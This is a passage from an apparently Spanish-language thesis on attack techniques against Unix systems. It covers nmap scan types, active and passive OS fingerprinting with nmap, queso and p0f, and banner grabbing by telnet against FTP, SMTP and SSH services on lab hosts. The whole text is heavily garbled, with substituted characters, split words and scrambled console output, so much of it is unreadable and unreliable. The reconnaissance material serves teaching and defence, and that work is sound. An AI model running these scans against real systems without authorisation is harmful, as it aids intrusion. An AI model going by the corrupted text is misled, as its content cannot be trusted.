Consola 0% Eje "lo de un escaneo de !rotocolos 7! 0* !ara ver un listado de "rotocolos ' su c8digo res"ectivo # ver el arc$ivo &etc&"rotocols de cualquier ,? ti"o 2ni9# o ver% $tt"%&&III.iana.org&assign ents&"rotocol(nu bers Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J1 de 22O
En la consola 0 "uede verse que de los "ri eros 1* "rotocolos escaneados# la a'or)a estn cerrados ' algunos "ocos abiertos. Es interesante co "robar que 7!vJ est activado en este $ost. :a ca"tura eje "lo de este escaneo ;nG ero *1B> se la "uede encontrar junto a las de s de este ca")tulo en el Ane9o B.
@ecesidad de "oseer "er isos de usuario root o ad inistrador del ,iste a ?"erativo ;C!riv.<aID>. Lelocidad <elativa con res"ecto al resto ;CLeloc.D>02. Cun CsigilosaD o Cstealt$D es la tcnica. :a "recisi8n de los resultados. !ara qu se usa# con qu objetivo co Gn se utiliza. 4riv.Ra@ Beloc. Atealt9 4recisi-n
,i @o ,i ,i ,i ,i ,i @o ,i Media Baja Media Media Alta Media Mu' Baja Mu' Baja Baja Medio Mu' Bajo Alto Alto Medio& Bajo Alto Mu' Alto Alta Alta Media Baja Media Media Alta
Fi"o&Caract. ,'n ,can Connect ,can Ac6 ,can 4indoI ,can 25! ,can M&@ull&Fin&A as 7dle ,can FF! Bounce 7! ,can
0(jetivo
!uertos Abiertos # Cerrados ' Filtrados !uertos Abiertos # Cerrados ' Filtrados !uertos Filtrados !uertos Filtrados _ Abiertos&Cerrados !uertos 25! Cerrados o Abiertos&Filtrados !uertos FC! Cerrados !uertos Abiertos# Cerrados ' Filtrados !uertos Abiertos# Cerrados&Filtrados 5etectar "rotocolos activos de Ca"a 1
02 As) ' todo# cabe recordar que la ra"idez de/initiva de un escaneo se debe a innu erables /actores co o tr/ico# dela'# anc$o de banda# resultados de la eta"a de $ost discover'# etc. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J5 de 22O
El FC!&7! Fingerprinting ;C$uella dactilarD de FC!&7!# ta bin lla ado C?, Finger"rintingD "or C?perating S1stem Finger"rintingD> trata de establecer qu ,iste a ?"erativo gener8 un "aquete o cierto tr/ico de red# de acuerdo a "articularidades conocidas de las di/erentes i "le entaciones de FC!&7!. :uego de este "aso# el intruso "uede buscar ataques conocidos# con/iguraciones dbiles "or de/ecto# /allos de diseBo# etc. "ara al ar ar un listado de intentos de intrusi8n a este nivel. Esto sucede "orque si bien los <FC son bastante detallados ' cubren la a'or)a de los casos que suceden en la "rctica# aun as) dejan algunas situaciones sin es"eci/icar ;"or su i "robabilidad de ocurrencia o su insigni/icancia># que di/erentes ,iste as ?"erativos i "le entan en su "ro"ia versi8n de FC!&7! a su anera. enos intentar
ejecutando 4indoIs o :inu9# su naturaleza P!: $izo que se distribu'era C/ir asD "ara que cada vez @ a" agreg8 las
u'
r"ida ente e in ediata ente a"arecieron colaboradores a"ortando nuevas s ,?s /ueran detectados. Mu' "oco tie "o des"us todo de /unciona iento o is as ca"acidades ;en ?ctubre de *00O># ' varias $erra ientas is o tie "o "ara au entar la e/ectividad01.
:a idea bsica es si ilar a la de un "ort scanner% el atacante ejecuta un so=t@are que env6a >prue(as? o paquetes >sin sentido? a un 9ost o(jetivo cu!as respuestas ;o /alta de ellas> son interpretadas como evidencia% en (usca de un patr-n de comportamiento que coincida con uno conocido de antemano% perteneciente a un Aistema 0perativo en particular . Estos "atrones ; s conocidos co o C/ir asD> "or lo general se al acenan en un arc$ivo de con/iguraci8n# al cual se "er ite acceder# odi/icar ' co "artir con el "ro'ecto original o con terceros "ara a "liar las ca"acidades de detecci8n# dado que es legible o est docu entado ' es inteligible05 ;ver Consolas *. ' **>.
marcelo@saturno:~/src/3ueso&980922$ !at que o.!onf L----------------------------------------------------------L que o.!onf bE a@ageIapo to" .org L----------------------------------------------------------L ,=.: M87: que o.!onf4@ 1.30 199);09;16 0):(6:0+ anonEmou <Dp M L----------------------------------------------------------L Pa6et Bormat: L L n a > f L n -> 0..5 -> pa6et N 9in re pon e to .4.#4B4B#4.B4P: L -> 0 1 -> !ontainO eq 911Ee 401no4-1no rep"E: L a -> 0 1 - PD $ -> !ontainO a!6 L > -> 0 1 D -> >in7o> 9 01no4 11 i4 D1'eDA@a"ue : L f -> .$#BPG/K -> ./N $.T #,5 B8N P.? GGG /// K$H<NT-ptr L L----------------------------------------------------------?...@ Q ,8.,O-8O. 11.0 0 1 1 1 .# 1 - - - ( 0 1 0 $# 3 0 0 0 $ + - - - 5 0 1 0 $# ?...@
01 =erra ientas Activas de ?, Finger"rinting% $tt"%&&III.netIor6intrusion.co.u6&os/a.$t 05 @ a" tiene un /or ato de /ir as de ,iste as ?"erativos un tanto "articular# que est docu entado en este enlace% $tt"%&&n a".org&osdetect&osdetect(/inger"rint(/or at.$t l Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J+ de 22O
Consola **% Fir a de ?"enB,5 1.2 al acenada en el /or ato de @Ma" 2da generaci8n
@ a" en "articular ree "laz8 la "ri era edici8n del ,?0J a "artir de la versi8n 1.5.0+# "or un nuevo
otor de detecci8n de
otor conocido co o de su
Csegunda generaci8nD. Este gran ca bio estuvo siendo "re"arado durante alrededor de 2 aBos# 'a que el arc$ivo de /ir as que incor"oraba /ue reconstru)do desde cero. =o' @ a" "osee en la Glti a versi8n a este :a segunda generaci8n del
S@MA!U?,2T>
/ir as corres"ondientes a 1+O ,?s o versiones di/erentes de ,?s0O. otor de /inger"rinting de @ a" ;Ler categoriza su evaluaci8n co "leta en 5 tests generales en donde
cada uno env)a una serie "rede/inida de "aquetes. :a res"uesta que se obtiene de cada test "er ite $acer varias ' di/erentes evaluaciones '&u obtenci8n de "ar etrosH estas evaluaciones o "ar etros se agru"an "or lo que se lla an probes dentro de un Fest. Fodos estos probes co "uestos "or sus "ar etros calculados con/or an la C$uella dactilarD de un ,? ' son los que e/ectiva ente se vuelcan en un arc$ivo de /inger"rint. @ a"# co o la a'or)a de este ti"o de $erra ientas# /o entan la is o sea re"ortado al "artici"aci8n de los usuarios i "ri iendo "or "antalla un /inger"rint que no e9ista en la base de /ir as# con la intenci8n de que el "ro'ecto junto con la identi/icaci8n de a qu ,? "ertenece.
0J !ara s in/or aci8n sobre la "ri era generaci8n del otor# que aGn sigue siendo Gtil# ver
S@MA!U?,*T ' S=ACRUEA!T# Ca". 2. 0+ Ler $tt"%&&insecure.org&st/&@ a"(1.5.(<elease.$t l 0O !ara a'or in/or aci8n de los ca bios entre las di/erentes versiones de @ a"# ver el siguiente enlace% $tt"%&&n a".org&c$angelog.$t l Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. JO de 22O
=e aqu) una breve enu eraci8n de los tests de ?, /inger"rinting de 2da. generaci8n realizados "or @ a" ' de la a'or)a de las evaluaciones que corre sobre las res"uestas obtenidas00 "ara obtener los "ar etros del ,?% 7. Test de Meneraci-n de N'meros de Aecuencias ;probes ,EV# ?!,# 47@ ' F*>. Bsica ente son J ,K@s ;con di/erentes co binaciones de flags> a un "uerto abierto. !ar etros ?btenidos% aE ?btenci8n de M9i o Co Gn 5eno inador en los @G eros de ,ecuencia FC! 7niciales ;o 7,@s>*.. ;M/D>. (E Clculo de la Media del au ento de los @G eros de ,ecuencia FC! 7nicial obtenidos ;IAR>. cE 7ndice de "redictibilidad de la secuencia de 7,@s obtenida ; A4>. Es la varianza de lo anterior. Esti a la di/icultad de "redecir el siguiente 7,@ de una secuencia conocida de J 7,@s. dE Evaluaci8n del algorit o de generaci8n de ,ecuencias 7!(75 "ara "aquetes FC! e 7CM! ;TI% II>. eE Booleano de ,ecuencia 7! 75 Co "artida ;AA>. ,i el destino co "arte la secuencia 7!(75 entre los "rotocolos FC! e 7CM!# este ca "o se establece en C,D# que "roviene de CS aredD# o CCo "artidaD. =E ?"ciones de FC! ;0 o 07.0#>. @ a" env)a en los "robes de este test algunas o"ciones de FC! ' aqu) se al acenan las res"uestas obtenidas. )E Fa aBo de Lentana FC! 7nicial ;H o H7.H#>. ,8lo se al acena el ta aBo de ventana del "aquete recibido "or cada probe. 9E <es"uesta ;R>% ,i el $ost res"ondi8H s8lo se al acena un CKD o C@D. iE Bits 7! de @o Frag entaci8n en "aquetes FC! e 7CM! ; D2% D2I>. ,e al acena si los "aquetes recibidos conten)an el bit en cuesti8n activado o no. jE Lalor FF: 7nicial del ca "o 7! ; T> ' su valor original esti ado ;TM>. ,e al acena el FF: de las res"uestas recibidas ;todas son CinicialesD#
00 Entre "arntesis al /inal de cada )te se encuentran los c8digos que el autor de @ a" le asign8 dentro del docu ento al que se $ace re/erencia ;S@MA!U?,2T>. *.. El @G ero de ,ecuencia FC! 7nicial o 7,@ es el valor del ca "o FC!(@G ero de ,ecuencia del "ri er "aquete ,K@_ACR que devuelve el $ost destino a un ,K@ enviado "or @ a" a un "uerto abierto. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. J0 de 22O
'a que este tr ino se re/iere a la res"uesta de un ,K@> ' se trata de establecer cul es el FF: realH "or lo general es la "otencia de 2 s cercana. :E @G ero de ,ecuencia FC! ;A>. 5i/erencia entre @G ero de ,ecuencia de la res"uesta ' el @G ero de ACR del ,K@ que envio @ a". !uede establecerse en cero ;Q># iguales ;A># el ACR es cualquier otro caso ;?>. lE @G ero de ACR FC! ;A>. ,i ilar al anterior "ero lo que se co "ara es la di/erencia entre el ACR de la res"uesta ' el @G ero de ,ecuencia en el ,K@ enviado "or @ a". !uede ser cero ;Q># iguales ;,># el ACR es a'or en uno ;,_># o cualquier otro caso ;?>. mE Banderas ;Flags> FC! ;2>. Este ca "o guarda las banderas FC! de la res"uesta. +. Test de Fco I/14 ;probe 7E>. Env)a 2 "aquetes 7CM! ti"o .9.O ;ec$o> con sutiles di/erencias en el encabezado 7!. Evaluaciones realizadas con sus resultados '&o !ar etros ?btenidos% aE <# 5F7# F# FP ;descri"tas anterior ente>. (E Fi"o de ,ervicio 7! ;Fo,> "ara <es"uestas 7CM! ; T0AI>. Al acena la co "araci8n de las res"uestas a los probes enviados en este Fest. cE C8digo de <es"uesta 7CM! ;/D>. Al acena la relaci8n del c8digo de res"uesta del ec$o(re"l' 7CM!. ,e su"one que es cero "ero a veces var)a. dE :ongitud de los datos "ara las res"uestas 7CM! ; DLI>. Cuando se inclu'en datos en los ec$o(request 7CM! se su"one que en el re"l' retornan igual. Este "ar etro al acena el ta aBo del re"l' ;de esta anera se sabe si es igual o no al es"erado>. ;. Test de Noti=icaci-n Fxpl6cita de /on)esti-n T/4 ;probe EC@>. Consiste en enviar un "aquete FC! con banderas de congesti8n de tr/ico FC! activadas. Evaluaciones realizadas con sus resultados '&o !ar etros ?btenidos% aE <# 5F# F# FP# 4# ? ;descri"tas anterior ente>. (E @oti/icaci8n de congesti8n e9"l)cita ;//>. Fodo este Fest de"ende de esta evaluaci8n# que tiene que ver con el anejo de los ensajes de congesti8n FC! del destino ;' de sus /lags C4< ' ECE>.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +. de 22O
a'or
<. T/4 ;Probes F2 al F+>. ,e env)an J "aquetes FC! con sus resultados '&o !ar etros ?btenidos% aE <# 5F# F# FP# 4# ,# A# F# ? ;descri"tas anterior ente>.
s# con varias
. UD4 ;Probe 2*>. Esta "rueba env)a * "aquete a un "uerto 25! cerrado# con el objetivo de recibir un 7CM! !ort 2nreac$able ' analizarlo. Evaluaciones realizadas con sus resultados '&o !ar etros ?btenidos% aE <# 5F# F# FP# F?, ;descri"tas anterior ente>. (E Fi"o de ,ervicio 7! ;T0AE corres"ondiente al "aquete recibido. cE :ongitud Fotal en encabezado 7! ;I4L>. ,8lo se lo al acenaH var)a segGn la i "le entaci8n 'a que la es"eci/icaci8n da a elegir cuntos b'tes del "aquete inicial debe devolver co o "a'load del 7CM!. dE !rueba de la longitud total en el encabezado 7! ; RI4L>. C$equea que el ca "o lengt$ del encabezado 7! contenga el valor corres"ondienteH algunas i "le entaciones generan eE Lalor del 7! 75 retornado ;RID>. =E Lalor correcto del c$ec6su ;RUL% RU/J>. 9E 7ntegridad de los datos 25! devueltos ;RUD>. Co o @ a" sabe lo que envi8 ' lo que debe recibir ;'a que est establecido "or el <FC># c$equea el "a'load 25! del !ort 2nreac$able. !ara ver un caso "rctico de la inter"retaci8n de una /ir a ' el clculo de los estos "ar etros# ver el Ane9o C en la "g. 2.-. del encabezado 7! ;RI4/J>. del encabezado 25! )E 7ntegridad de los ca "os longitud ' c$ec6su al este valor.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +* de 22O
.tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-31 17:13 #$T 8ntere ting port on !i!"on 919(.16).0.30:: Not 'o>n: 1711 !"o e7 port PO$T .T#T< .<$=8,< (1;t!p open ftp ((;t!p open ' 53;t!p open 7omain 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: )e<ice tDpe: general purpose /unning: +ree(-) 0.E 4- details: +ree(-) 0.0&(C2%. & 0.0&-2%(7C Fptime: 0.000 daDs !since Gon Gar 1 10:1 :20 2008" Net>or6 Di tan!e: 1 'op O. 7ete!tion performe7. P"ea e report anE in!orre!t re u"t at 'ttp:;;in e!ure.org;nmap; ubmit; . Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 16.73+ e!on7 marcelo@saturno:~/src/nmap/bin$
Consola *2% 5etecci8n de ,iste a ?"erativo con @Ma" N Coincidencia de /ir a "er/ecta
En la Consola *2 se "uede ver una ejecuci8n e9itosa del una detecci8n s a"ro9i ada# 'a que se "osee uno o
otor de ?,
Finger"rinting de @ a". En este caso se dan todas las condiciones necesarias "ara s "uertos abiertos ' cerrados ' la /ir a 'a e9iste en la base. En caso de que no sea tan /avorable# se le "uede "edir que establezca un "orcentaje de c$ances de acertar.
5ado que los "aquetes ,K@ no requieren est) ulo "revio de ningGn ti"o ;es
*.* ,itio del !ro'ecto =one'net% $tt"%&&"roject.$one'net.org& *.2 =erra ientas !asivas de ?, Finger"rinting% $tt"%&&III.netIor6intrusion.co.u6&os/".$t *.- ,i bien /ue uno de los "ri eros en i "le entar /inger"rinting "asivo# ,i"$on es una $erra ienta 'a en desusoH su 4eb es% $tt"%&&si"$on.datanerds.net *.1 Etterca" es una $erra ienta que "uede utilizarse "ara di/erentes tareas ' ta bin inclu'e un 8dulo "ara $acer /inger"rinting "asivo. 2<:% $tt"%&&etterca".source/orge.net& *.5 ,itio 4eb de !.F% $tt"%&&lca tu/.coredu ".c9&"./.s$t l Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +2 de 22O
decir# de ninguna $erra ienta># es l8gico su"oner que s-lo escuc9ando D>esni=eando?E por paquetes ANN en la red se puede dilucidar qu A0 ejecuta cada I4 con la que se tiene contacto . 5e a$) surge el no bre de Cpassive fingerprintingD# 'a que si con la tcnica anterior ;/inger"rinting activo> era necesario enviarle "aquetes a un $ost "ara evaluar c8 o res"onde# con ste todo s8lo es necesario "onerse a Cescuc$arD el tr/ico ' co "robar si los "aquetes detectados tienen caracter)sticas es"ec)/icas de un ,? o no. ,in e bargo# est claro que sigue siendo necesaria una base de datos con los fingerprints o C/ir asD conocidas# relacionadas con los "ar etros que los di/erencian. :a docu entaci8n de "./ ' ta bin otras /uentes ; S,ECU4A<T#
SF7@PU!A,T>
' en este caso# son entre otras% Fa aBo Fotal de !aquete 7nicial ;7! _ FC!> Encabezado 7!%
FF: 7nicial en el encabezado 7! Bit de C@o Frag entaci8nD 7! Fa aBo M9i o de ,eg ento FC! ;/SS> ?"ci8n de Escala iento de la Lentana FC! ;%S&4>3>*.J Fi esta " en las ?"ciones de FC!*.+ Fa aBo de Lentana FC! ;%indo. Si$e> ACRs ,electivos !er itida o no ;S4&<>*.O Bits de @o ?"eraci8n FC! ;G?P>
Encabezado FC!%
:a secuencia de los "ar etros corres"ondientes a los ca "os o"cionales de FC! ;/SS, S4&<, G?P 1 %S&4>3>. !./ en "articular indica ' al acena en su base de /ir as algo s de
*.J :a o"ci8n de escala iento de ventanas "er ite de/inir ta aBos de ventana FC! de/inida en el <FC *-2-# "g. O% $tt"%&&tools.iet/.org&$t l&r/c*-2-c"age(O
a'ores que
los J55-J b'tes que el ca "o %indo. Si$e del encabezado FC! original. Esta o"ci8n est *.+ El ti esta " sirve "ara que un lado de la cone9i8n "ueda calcular el <FF de la cone9i8n# con el /in de descartar seg entos CviejosD du"licados# en un ecanis o lla ado !A4,. Est de/inido ta bin en el <FC *-2-# "g. *+% $tt"%&&tools.iet/.org&$t l&r/c*-2-c"age(*+ *.O :a o"ci8n ,ACR de FC! est docu entada en el <FC 2.*O% $tt"%&&tools.iet/.org&$t l&r/c2.*O Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +- de 22O
in/or aci8n que el listado de arriba# co o se "uede ver en la Consola @ro *-. All) lo que se "uede ver es la base de /ir as ,K@# que es la que alguna odalidad tradicional ' la ejores resultados brinda. :a desventaja de esto es que $a' que lograr de anera que el objetivo inicie cone9iones con el equi"o que est ejecutando u' di/)cil.
marcelo@saturno:~$ u7o !at ;et!;p0f;p0f.fp N Bingerprint entrE format: N N >>>>:ttt:):ss:444...:HH:4-:)etails N N >>>> - >in7o> iOe 9!an be Q or Snnn or .DD or TDD: N V.nnV 9mu"tip"e of 3..: an7 VTnnV 9mu"tip"e of 3TK: are a""o>e7. N ttt - initia" TT2 N D - 7onJt fragment bit 90 - not et4 1 - et: N - o@era"" ./N pa!6et iOe 9Q 'a a pe!ia" meaning: N OOO - option @a"ue an7 or7er pe!ifi!ation 9@ariab"e- ee be"o>: N RR - quir6 "i t 9@ariab"e- ee be"o>: N O. - O. genre 92inuD4 .o"ari 4 &in7o> : N 7etai" - O. 7e !ription 9(.0.(7 on D)64 et!: ?...@ ----------------- 2inuD ------------------?...@ .+:6+:1:60:3Q4.4T4N4&5:.:2inuD:(.6 9ne>er4 1: .+:6+:1:60:3Q4.4T4N4&6:.:2inuD:(.6 9ne>er4 (: .+:6+:1:60:3Q4.4T4N4&7:.:2inuD:(.6 9ne>er4 3: T+:6+:1:60:3Q4.4T4N4&7:.:2inuD:(.6 9ne>er4 +: ?...@ ----------------- .o"ari ----------------?...@ .3+:6+:1:5(:3Q4N4&04N4N4.:.:.o"ari :10 9beta: 3()50:6+:1:6+:3Q4N4N4T4N4&14N4N4.:.:.o"ari :10 91(03*: 3()50:6+:1:6+:3Q4N4&14N4N4T4N4N4.:.:.o"ari :9.1
s /uncionalidad# co o "or
eje "lo la detecci8n de ,?s basado en /inger"rints de "aquetes ,K@_ACRs# de <,F_ ;<,F o <,F_ACR> ' de cone9iones establecidas ;s8lo con ACRs>. Esto "er ite que uno "ueda iniciar cone9iones nor al ente# co o si la Cintenci8nD del usuario /uera ser cliente del servicio que corre en el objetivo# ientras "./ interce"ta el ,K@_ACR e in/or qu ,? coincide con la /ir a recibida. Algo si ilar sucede en el caso de la detecci8n basada <,F_# salvo que el "uerto del objetivo est cerrado. 5e todas de anlisis dis inu'en en buena aneras# las "osibilidades de 9ito con estos ti"os edida ;en el <EA5ME*.0 de "./# secci8n ** el
AGn as)# ' sin i "ortar el ti"o de detecci8n utilizado# lo interesante de esta tcnica ' que le a"orta uc$o valor es su capacidad de pasar casi totalmente uestra una odo ,K@ "or desaperci(ida por el 9ost que es anali3ado . En la Consola *1 se ejecuci8n de "./ en un $ost que "osee la 7! *02.*JO...-. en el bastante alta.
?root@ciclon ~@A p0f -i em0 p0f - pa i@e o fingerprinting uti"itE4 @er ion (.0.) 9,: 3. Ua"e> 6i T"!amtufI7ione.!!>4 &. .tearn T> tearn IpoboD.!om> p0f: "i tening 9./N: on Jem0J4 (6( ig 91+ generi!4 !6 um 0B1B5,#(:4 ru"e: Ja""J. 19(.16).0.(:+7706 - 2inuD (.6 9ne>er4 3: 9up: +1 'r : -> 19(.16).0.30:(( 97i tan!e 04 "in6: et'ernet;mo7em: 19(.16).0.(0:(+)09 - OpenC.D 3.0-3.9 9up: 7(67 'r : -> 19(.16).0.30:(( 97i tan!e 04 "in6: et'ernet;mo7em: 19(.16).0.100:10(5 - 2inuD (.( 9(: 9up: 0 'r : -> 19(.16).0.30:(( 97i tan!e 04 "in6: et'ernet;mo7em: 19(.16).0.33:5)061 - KN5NO&N -65535:6+:1:60:31+604N4&34.4T:.:*:*0 9up: 135 'r : -> 19(.16).0.30:)0 9"in6: et'ernet;mo7em: W,PPP <Diting on igna" ( PPP -P0 #@erage pa!6et ratio: 0.65 per minute. ?root@ciclon ~@A
de/ectoH varios $osts se conectaron a di/erentes servicios ' la tasa de 9ito /ue
:as Gnicas di/erencias a"reciables son que la versi8n real de ?"enB,5 era la 1.2 en vez de -.0# ' que la cone9i8n de un FreeB,5 +.. no /ue identi/icada. !ara ningGn cliente $ubo actividad Csos"ec$osaD o di/erente a la nor al.
"robabil)sticos ' "er ite varias coincidencias si ultneas# "ero coincide con sus ancestros en que necesita de una base de datos de /ir as ' al enos un "uerto abierto ' un "uerto cerrado en el destino "ara realizar el test en condiciones 8"ti as. :a ventaja de este todo es que es s resistente a las condiciones del :os autores ta bin uc$o s "reciso entorno que "ueden a/ectar a las "ruebas deter inistas# co o "or eje "lo routers# /ireIalls# de oras en el tr/ico# etc. ***. a/ir an que env)an enos "aquetes a la red ' que es
que @ a" ' que cualquier otra $erra ienta de detecci8n de ,? re oto.
Detecci-n por Timeouts de T/4GI4% Fa bin lla ado <7@P**2 "or ?livier Courta'# Franc6 Le'sset ' ?livier =een# que "ublicaron un "a"er donde desarrollaron una tcnica basada en el clculo de los ti eouts FC!&7! del $ost ;S<7@PU?,F@PT#S<7@PU?,T> al "rogra adores en qu valores utilizar. :a idea es si "le% s8lo se env)a a un "uerto abierto un Gnico ,K@# ' "osterior ente se contabiliza la cantidad ' la de ora entre los di/erentes ,K@_ACR que env)a el destino tratando de iniciar la cone9i8n. Fa bin se tiene en cuenta la a"arici8n de un <,F luego de algunas res"uestas. 5e esta es el anera se logran identi/icar los di/erentes ,?s# ' lo interesante es que )ni o "osible% un Gnico "aquete. :a desventaja es que en el es bastante di/)cil de detectar# 'a que no es tr/ico CinusualD ' su cantidad C undo realD# es "robable que los tie "os se alteren "or dis"ositivos inter edios ' se obtengan resultados incorrectosH "or otra "arte# es"erar "or ti eouts "uede ser un "roceso u' lento ' tedioso. u' "eligroso ' no tan s Cnuevo> "or /ronolo)6a de Fxploits% Es un test que "uede ser conocidos en orden coronol8gico ;del o ento de iniciarse la cone9i8n. Esta es otra rea donde los <FC dan libertad a los
Gtil a /ines "rcticos. ,i "le ente consiste en enviar al objetivo e9"loits s CviejoD a /uerza bruta# $asta que el siste a e/ectiva ente caiga. Ka que el e9"loit segura ente est relacionado con una versi8n o versiones bastante es"ec)/icas del ,?# en algunos ; u' raros> casos "uede considerrselo
*** !ara s docu entaci8n ;"a"ers# "resentaciones# etc.> sobre Finger"rinting 5i/uso# visitar el siguiente enlace% $tt"%&&s's(securit'.co &blog&"ublis$ed( aterials& **2 <7@P% Acr8ni o de :emote 6dentification, Gext @eneration H 7denti/icaci8n <e ota# @ueva Peneraci8n. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +J de 22O
co o alternativa.
onitoreo# /ireIall# etc. no notar ninguna di/erencia de asiado evidente entre un intruso intentando detectar la versi8n del so/tIare que brinda el servicio con un cliente nor al del is o.
co andos "ara ordenarle al servicio que realice tal o cual tarea. ,i bien $a' "rogra as que son
**- :a traducci8n literal es CCa"tura de FitularesD# aunque a"licado a la tcnica una traducci8n "odr)a ser CCa"tura de EncabezadosD. **1 @etcat es
s adecuado que Felnet "ara $acer este ti"o de cosas# "or as"ectos tcnicos ' s
"orque est casi tan e9tendido co o Felnet. Ler Consola 2. en la "g. O0 "ara e9a inar un eje "lo# ' este enlace% $tt"%&&en.Ii6i"edia.org&Ii6i&FelnetcCurrentUstatus que contiene in/or aci8n sobre los "roble as de asu ir que Felnet equivale a una cone9i8n CcrudaD ;ra.>. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. ++ de 22O
@rabbing# el "rogra a cliente de Felnet ;S47R7UFE:@EFT> es el so/tIare ubicuo "or e9celencia "ara conectarse a cualquier $ost%"uerto FC! e interactuar Ca con el servicio que aloja el server re oto.
marcelo@saturno:~$ te"net 19(.16).0.100 (1 TrEing 19(.16).0.100... ,onne!te7 to t unami. < !ape !'ara!ter i JW0J. ((0 rI62 +2* ser<er !Jersion >u&2.6.0!1" Gon +eb 28 10: 0: 6 C-2 2000" rea7E. F-C/ anonEmou 331 Hue t "ogin o64 en7 Eour !omp"ete e-mai" a77re a pa >or7. *%-- anonIte t.!om (30 Hue t "ogin o64 a!!e re tri!tion app"E. KC7* (1+-T'e fo""o>ing !omman7 are re!ogniOe7 9Q 1>J unimp"emente7:. K.<$ PO$T .TO$ 3.#3Q $NTO N2.T 35D ,DKP ?...@ !sigue" (1+ Dire!t !omment to root@localIost. -8-2 (15 F9IE 2Dpe: 78 -2%2 (11-r'6( BTP er@er tatu : Jersion >u&2.6.0!1" Gon +eb 28 10: 0: 6 C-2 2000 ,onne!te7 to 19(.16).0.( ?...@ !sigue" (11 <n7 of tatu *L) (57 V;V i !urrent 7ire!torE. HFI2 ?...@ sigue ((1 Hoo7bEe. ,onne!tion !"o e7 bE foreign 'o t. marcelo@saturno:~$ te"net 19(.16).0.100 (5 TrEing 19(.16).0.100... ,onne!te7 to t unami. < !ape !'ara!ter i JW0J. ((0 localIost.localdomain C-G2* -endmail 8.9. /8.9. # T'u4 3 #pr (00) 1):(7:53 -0+00 J/+8 root 210 root Mroot@localIost.localdomain' J/+8 a7min 550 a7min... K er un6no>n HFI2 ((1 "o!a"'o t."o!a"7omain !"o ing !onne!tion ,onne!tion !"o e7 bE foreign 'o t. marcelo@saturno:~$ te"net 19(.16).0.30 (( TrEing 19(.16).0.30... ,onne!te7 to !i!"on. < !ape !'ara!ter i JW0J. --K&2.0&4pen--KN..1p1 +ree(-)&20061110 ,onne!tion !"o e7 bE foreign 'o t. marcelo@saturno:~$
anoD
En la Consola *5 se
ediante un cliente telnet !ri ero se "uede a"reciar la in/or aci8n que "ublican los servicios de FF! ' de ,MF! ;res"ectiva ente> del $ost *02.*JO...-.# ' luego
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +O de 22O
se establece una cone9i8n con el servicio de ,,= en el $ost *02.*JO...-.. :o escrito "or el intruso est en negrita# ' la in/or aci8n Gtil est resaltada en color rojo. El $ost Ctsuna iD evidente ente est ejecutando una versi8n <ed =at ;J.2># ' entre otras cosas est de ail es vlida en ese servidor o no. u' vieja de u' descuidado% su servidor ,MF! "er ite
la ejecuci8n del co ando L<FK# que contesta ;sin autenticarse> si una direcci8n
anera de encarar el
"roble a es que evita "osibles inconvenientes del banner grabbing# co o "or ,i el intruso Cse to"aD con un ad inistrador "recavido# es "robable que $a'a con/igurado el so/tIare "ara que de in/or aci8n# $acindolo al usuario.
uestre la
el que atiende "eticiones el servicio# utilizando uno di/erente a las convenciones**5 '&o con/iguraciones "or de/ecto. !or eje "lo# un ,ervidor 4eb# que t)"ica ente aguarda "or cone9iones en el "uerto O.# "uede encontrarse en el "uerto O.O..
otroH "or eje "lo# $acer que un ,ervidor ,MF! ,end ail O.9 se identi/ique al cliente co o un !ost/i9 2.1.
**5 :a
a'or)a de las relaciones C@G ero de !uerto ae ,ervicioD los asigna el 7A@A ; 6nternet
4ssigned Gumbers 4ut orit1>H stas se consideran se i(estndares ;'a que son una reco endaci8n a seguir# no una obligaci8n># de/inida "or un i "ortante ente de 7nternet# que controla los 5@,s ra)z ' las 7!s asignadas# "or eje "lo. !ara ver un listado de los "uertos ' servicios reconocidos "or el 7A@A# ver este enlace% $tt"%&&III.iana.org&assign ents&"ort( nu bers. ,in e bargo# esto no i "ide que se "ueda $acer caso o iso de esta reco endaci8n. !or otro lado# e9isten servicios no enu erados en el listado ' que sin e bargo se conoce qu "uerto utilizan ;aun "roducindose colisiones de nG eros de "uerto en algunos casos>. Ms in/or aci8n% $tt"%&&en.Ii6i"edia.org&Ii6i&:istUo/UFC!UandU25!U"ortUnu bers Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. +0 de 22O
encri"tada# con lo cual la interacci8n v)a telnet se $ace casi i "osible. !or estos otivos el /inger"rinting# al compro(ar un comportamiento
t6pico ! conocido de una aplicaci-n% (rinda ms se)uridad en los resultados o al menos una instancia adicional para 9acer las compro(aciones previas de un posi(le ataque. 2na de las $erra ientas s "o"ulares**J ;' que se dedica 8dulo de detecci8n e9clusiva ente a esta labor> es A a"**+# junto ;otra vez> a @ a"# que ade s del /inger"rinting de ,iste as ?"erativos ta bin cuenta con un de versiones de servicios.
5.2.2.*. A a"
